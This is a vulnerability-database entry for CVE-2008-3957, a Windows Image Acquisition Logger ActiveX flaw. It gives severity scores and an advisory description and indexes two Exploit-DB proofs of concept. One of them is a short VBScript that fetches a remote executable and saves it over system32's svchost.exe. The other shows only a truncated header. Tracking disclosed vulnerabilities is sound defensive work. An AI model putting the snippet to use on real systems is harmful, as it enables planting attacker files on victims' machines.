CVE-2008-3957
published 2008-09-11CVE-2008-3957: The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL…
PriorityP349critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
17.76%
96.8th percentile
The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)
exploitdb·2008-09-08
CVE-2008-3957 Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)
Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)
---
source: https://www.securityfocus.com/bid/31069/info
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.
/*Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite
Credits for finding the bug go to S4rK3VT TEAM,nice work Ciph3r :) .
Credits for exploit go to fl0 fl0w
References- https://www.securityfocus.com/bid/31069/info
*/
#include
#include
#include
#include
Exploit-DB
Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)
exploitdb·2008-09-08
CVE-2008-3957 Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)
Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)
---
source: https://www.securityfocus.com/bid/31069/info
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.
Sub tryMe
dim remURL
remURL = "http://victim.com/svchost.exe"
test.Open remURL, True
test.Save "C:\WINDOWS\system32\svchost.exe", True
End Sub
No writeups or analysis indexed.
http://www.securityfocus.com/bid/31069http://www.securityfocus.com/data/vulnerabilities/exploits/31069https://exchange.xforce.ibmcloud.com/vulnerabilities/45015http://www.securityfocus.com/bid/31069http://www.securityfocus.com/data/vulnerabilities/exploits/31069https://exchange.xforce.ibmcloud.com/vulnerabilities/45015
2008-09-11
Published